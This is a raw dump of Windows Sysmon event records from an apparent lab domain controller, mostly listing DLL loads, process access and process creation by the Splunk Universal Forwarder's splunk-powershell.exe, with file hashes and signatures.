13:06:49.702{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.702{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.703{326FD73D-C169-6294-4B0B-000000005502}4460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.187{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.187{326FD73D-C169-6294-4A0B-000000005502}40163960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.171{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.171{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE150DD93EC575D59F06C546EFE0699,SHA256=AA5F7114C44C0120D6553C42D051CDEDE72666C0AAB533E022E46F4E414FDA48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.046{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 